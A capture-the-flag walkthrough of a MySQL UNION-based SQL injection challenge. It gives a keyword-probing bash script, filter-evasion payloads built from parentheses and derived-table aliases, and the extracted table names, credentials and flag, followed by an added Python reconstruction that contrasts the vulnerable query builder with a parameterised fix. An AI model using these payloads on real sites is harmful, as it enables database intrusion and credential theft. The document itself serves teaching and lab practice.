Level 5 – weblist

The source:

A simple GET form.

Some official clues:

"weblist": the cute solution should use "union"... I'd like you to find that way of solving the challenge ;-) Kachakil couldn't :-P
"Weblist": some ppl are still missing a certain property of MySQL with tables... :-#

Well, we're dealing with a SQL injection.

If you submit the double-quote character (") alone, you get a MySQL error message:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '""") and wl.id=wld.list_id' at line 1

This message gives us a clue: the query must be something like:

SELECT wl.id,wld.list_id,... FROM table1 wl, table2 wld WHERE wl.id IN("our-input-parsed") AND wl.id = wld.list_id

Our input must begin with the sequence ") and end with the sequence (", so the executed query will look like:

SELECT wl.id,wld.list_id,... FROM table1 wl, table2 wld WHERE wl.id IN("")some-things("") AND wl.id = wld.list_id

We need to find a some-things that returns the information we want while keeping the query syntactically valid. We also need to deal with the 'wl' and 'wld' aliases.

Trying some inputs, we see that some keywords are filtered.

If you try to submit:

1 and 1

you get:

'and' not allowed

Again, a script does the job of finding the non-filtered keywords.

The script:

#!/bin/bash
#
# get allowed keywords: submit "1 <KEYWORD> 1" for every MySQL keyword
# and print the keywords that do not trigger the "not allowed" message
#
while read -r KEYWORD
do
  # CONTENIDO is empty when the response does not contain 'not allowed'
  CONTENIDO=$(wget -O - "http://ctf.rs-labs.com:83/weblist_85baaaf3d4593fcbaeb3878c0357cfd4/?list=1 ${KEYWORD} 1" 2>/dev/null | grep -o 'not allowed')
  if [ -z "${CONTENIDO}" ]
  then
    echo "${KEYWORD}"
  fi
done < c5.keywords

The file c5.keywords contains every MySQL keyword, one per line. This is the (reduced) list of allowed keywords we get:

FROM, HAVING, SELECT, UNION

Trying things like:

") union select 1,table_name from information_schema.tables

This is not a valid injection yet (the closing (" is missing), but the error it produces shows that spaces are filtered:

'","union","select","1,table_name","from","information_schema.tables") and wl.id='

Our input is split on spaces and every token is enclosed in "", which is not what we want. Replacing the spaces with comments (/**/, which MySQL accepts as whitespace), we get:

Only one comment is allowed, you're screwed! :-)

Hmm! Enclosing operands (table names, column names, numbers, ...) in parentheses is also valid, so we can write:

")union/**/select(1),(table_name)from(information_schema.tables)having("

This way the end of our injection is fine, but we get:

Unknown column 'wl.id' in 'having clause'

This is fine: our query has passed the filters, but we still need to satisfy the alias part, 'and wl.id=wld.list_id'.

We need to provide two derived tables with wl and wld as alias names.
This is the trick:

(SELECT(1)id)wl

This subquery creates a derived table with a single column aliased id, and wl is the alias of the derived table itself.

Putting it all together:

")union(select(table_name),(2),(3)from(information_schema.tables))union/**/select(1),(wl.id),(wld.list_id)from(select(2)id)wl,((select(2)list_id)wld)having("

(We need to add the (2),(3) columns in the first SELECT to match the number of columns of the original SELECT; if we don't add these dummy columns the UNION fails.)
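To see why a keyword blacklist like this one does not hold up, here is an added example (not part of the original writeup) that reconstructs the challenge's query builder from the error messages above and contrasts it with a parameterised query that binds the list values as data; the blacklist contents, the table schema and the sample rows are assumptions.

```python
import sqlite3

# Constructed reconstruction of the challenge's query builder, inferred from the
# error messages shown in the writeup; the real server-side code is not on the
# page and the blacklist is a guess (the page only proves that 'and' is blocked).
BLACKLIST = {"and", "or", "where", "order", "insert", "update", "delete"}
PREFIX = "SELECT wl.id,wld.list_id FROM WebList wl, WebListDescr wld WHERE wl.id IN("
SUFFIX = ") and wl.id=wld.list_id"
PAYLOAD = ('")union(select(table_name),(2),(3)from(information_schema.tables))'
           'union/**/select(1),(wl.id),(wld.list_id)from(select(2)id)wl,'
           '((select(2)list_id)wld)having("')  # the writeup's payload, as test input

def build_query_unsafe(user_input: str) -> str:
    """Blacklist + string concatenation: how the challenge appears to work."""
    tokens = user_input.split(" ")
    for token in tokens:
        if token.lower() in BLACKLIST:
            raise ValueError(f"'{token}' not allowed")
    if user_input.count("/*") > 1:
        raise ValueError("Only one comment is allowed")
    # Each space-separated token is double-quoted and comma-joined, which is why
    # '") union select ...' showed up as '"")","union","select",...' in the error.
    return PREFIX + ",".join(f'"{t}"' for t in tokens) + SUFFIX

def is_rejected(user_input: str) -> bool:
    try:
        build_query_unsafe(user_input)
    except ValueError:
        return True
    return False

def sample_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the WebList tables found in the writeup."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE WebList(id INTEGER, name TEXT);
        CREATE TABLE WebListDescr(list_id INTEGER, description TEXT);
        INSERT INTO WebList VALUES (1,'news'),(2,'tools');
        INSERT INTO WebListDescr VALUES (1,'News sites'),(2,'Security tools');
    """)
    return conn

def fetch_safe(conn: sqlite3.Connection, user_input: str) -> list:
    """Parameterised version: one placeholder per value, every value bound as data."""
    values = [v for v in user_input.split(" ") if v]
    if not values:
        return []
    placeholders = ",".join("?" * len(values))
    sql = ("SELECT wl.id,wl.name,wld.description FROM WebList wl, WebListDescr wld "
           f"WHERE wl.id IN({placeholders}) AND wl.id=wld.list_id ORDER BY wl.id")
    return conn.execute(sql, values).fetchall()
```

The reconstructed filter lets the writeup's space-free payload straight through, while the parameterised query treats the same string as a list value that matches no id.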

Injecting the above we get all table names :)
The interesting tables:

UserPassword
UserPassword_55cf9c78f77986669bc362385cb55f97
WebList
WebListDescr

They look great!

Repeating the query for column names:

")union(select(column_name),(2),(3)from(information_schema.columns))union/**/select(1),(wl.id),(wld.list_id)from(select(2)id)wl,((select(2)list_id)wld)having("

We get:

login
password
login_3e1ce4bce9a68db1a1c576d1f76e5aa6
password_3e1ce4bce9a666b1a1c576d1f76e5aa6
id
name
list_id
description

It seems obvious that:

  • 'login' and 'password' are the 'UserPassword' columns
  • 'login_3e1ce4bce9a68db1a1c576d1f76e5aa6' and 'password_3e1ce4bce9a666b1a1c576d1f76e5aa6' are the 'UserPassword_55cf9c78f77986669bc362385cb55f97' columns
  • 'id' and 'name' are the 'WebList' columns
  • 'list_id' and 'description' are the 'WebListDescr' columns

If we look at the 'UserPassword' contents:

")union(select(login),(password),(3)from(UserPassword))union/**/select(1),(wl.id),(wld.list_id)from(select(2)id)wl,((select(2)list_id)wld)having("

We get:

“admin” “This is not the key :P But you are are very near now!”

Just another joke from the admins... :P

The right query:

")union(select(login_3e1ce4bce9a68db1a1c576d1f76e5aa6),(password_3e1ce4bce9a666b1a1c576d1f76e5aa6),(3)from(UserPassword_55cf9c78f77986669bc362385cb55f97))union/**/select(1),(wl.id),(wld.list_id)from(select(2)id)wl,((select(2)list_id)wld)having("

gives us the flag:

“adm1n” “cH4nG3d_t0_fUcK_k4cH4K1l

I don’t know what Kachakil did to force admins to change the Flag!

Difficulty: Hard
